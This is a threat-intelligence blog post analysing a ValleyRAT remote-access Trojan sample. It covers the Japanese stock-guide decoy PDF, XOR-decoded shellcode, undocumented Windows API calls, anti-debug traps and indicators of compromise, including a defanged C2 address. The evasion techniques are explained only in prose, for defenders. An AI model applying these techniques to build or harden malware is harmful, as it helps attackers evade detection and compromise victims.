Malware Analysis Space: APT Silver Fox is using a stock investment decoy and undocumented Windows API functions to evade detection

Summary

ValleyRAT is a remote access Trojan program used by the Silver Fox threat organization. I did threat hunting and found a lot of samples, but here I just analyzed one of them.

Technical analysis

ValleyRAT md5: 6923AB76F93C6D48B025D27A37E20D14
Portable executable for 80386 (PE)

Figure1-basic info

Release malware and decoy

ValleyRAT will release both Trojan “moomoo x64.exe” and decoy UUU.pdf in the directory “%LocalAppData%\Temp\,” and at the same time it starts a process, IE browser like msedge.exe, to open UUD.pdf, which is to attract the attention of the victim to cover the real motivation, the content of the PDF is written in Japanese about how to invest in the stock market, which seems the attacker is focused on the specific potential victims; in the background it also starts another Trojan process of “moomoo x64.exe.”.

Firgure2-Stock market guide

The traffic between client and server

When the process of “moomoo x64.exe” (md5: 11B499CC40D08A10C107A6FB55A31B65) is running in the background, the client will connect to the port of server “104[.]219[.]214[.]206:8008” and send an SYN request and receive an RST, ACK response from the server; obviously, the server closed by now.

Figure3-The traffic between client and server

Dive deep inside

The traffic between client and server was activated by shellcode which is embedded in the “moomoo x64.exe”, the shellcode is the global variable byte_479040 but need to do a XOR algorithm with the constant 0Xa7, the results of returning was copied from a place to the beginning memory address “000000000030E400” and ending with the special hex character “A7”, its length 0x256D1(or 153,297 in decimal) bytes , and then was changed the permission by the API function VirtualProtect and then to run until rasadhlp.dll loaded by assemble command “call r13 “.

Figure4-Xor and execute the shellcode

Figure5-the shellcode snippet in memory

lower-level undocumented windows API function

Move to the entry point of rasadhlp.dll, and a new find LdrResFindResourceDirectory which is an internal Windows API function used by the Windows Loaderntdll.dll to locate and retrieve resource directories within a Portable Executable (PE) file.

ZwProtectVirtualMemory(also known as)NtProtectVirtualMemory is a Windows Native API function used to change the memory protection of a region of virtual memory in a process.

The IP address 104[.]219[.]214[.]206 embedded decrypted after being called. LdrLoadDll is an undocumented Windows Native API function used to load a DLL into a process's address space.

Figure5.1-IP address

WSAttemptAutodialName is an undocumented function in the Windows Sockets (Winsock) API. It attempts to trigger an autodial connection for a specified network name. And the other undocumented functions used (e.g. WSNoteSuccessfulHostentLookup, WahReferenceContextByHandle,etc.)

Figure5.2-connect to C2

Policy and Evasion

The code dynamically resolves the addresses of critical Windows API functions (e.g., ,LoadLibraryA VirtualProtect, CreateFiber, SwitchToFiber, etc.) to avoid detection by antivirus or analysis tools. It loads the necessary DLLsactiveds.dllUser32.dll into the process address space. The API function VirtualProtect is used to do memory manipulation, like modifying memory permissions.

Figure6-The code of policy and evasion

The loop sleeps for 1 second per iteration, and it runs 10 times, so the total sleep time is 10 seconds. It seems to simulate a delay in execution; its potential aim is to do a simple anti-debug technique to waste time or frustrate reverse engineers.

Figure7-A simple anti-debug technique

To avoid the analyst debugging the malware, multiple traps about exit functions are set in the logic of the code. If the analyst needs to learn more details, they only do a little work; it is not complicated.

Figure8-Logic trap for anti-debug

The IsDebuggerPresent function is a Windows API function used to detect whether a debugger is attached to the current process.

Figure9-anti-debug

Generate a pseudo-random value

An interesting thing is the code generates a unique or pseudo-random value based on system information which Combine with System Time, Process ID, Thread ID, Tick Count and Performance Counter. qword_4B37F0 is a global variable initialized to 0x2B992DDFA232LL, If qword_4B37F0 still has this initial value, the code proceeds to generate a new value. The collected values are combined using XOR, the result is masked with 0xFFFFFFFFFFFFLL to ensure it fits within 48 bits.

Figure10-Generate a pseudo-random value

Unknown thing

It seems that some URL addresses are not used. The malware cleared all URL addresses in the end.

Figure11- Unused URL strings

IOCs

ValleyRAT md5: 6923AB76F93C6D48B025D27A37E20D14

moomoo x64.exe md5: 11b499cc40d08a10c107a6fb55a31b65

UUD.pdf md5: C4FD1E5F9DF850878E7B770F50031FD2

104[.]219[.]214[.]206

hxxps[:]//www[[.]]baidu[.]com/

hxxps[:]//www[.]google[.]com/

hxxps[:]//www[.]wikipedia[.]org/

hxxp[:]//www[.]digicert[.]com

hxxp[:]//ocsp[.]digicert[.]com

C:/program/12530/do.txt

Conclusion

ValleyRAT will release both Trojan “moomoo x64.exe” and decoy UUU.pdf, a PDF file opened by a browser to attract the attention of potential victims and cover up the real aim: “moomoo x64.exe” is running in the background to connect to the C2 server, the shellcode embedded in the malware, and decrypted with a simple algorithm XOR in order to anti-debug and fight against anti-virus vendors, which loads user-specified DLLs automatically and uses new Windows API functions and memory operation techniques, which can bypass some anti-virus vendors. It is still a hidden threat we need to pay more attention to.

End.

Support My Work:

**If you found this report helpful, consider supporting my work by buying me a coffee!** Your contribution helps me dedicate more time to malware analysis and creating free resources for the cybersecurity community.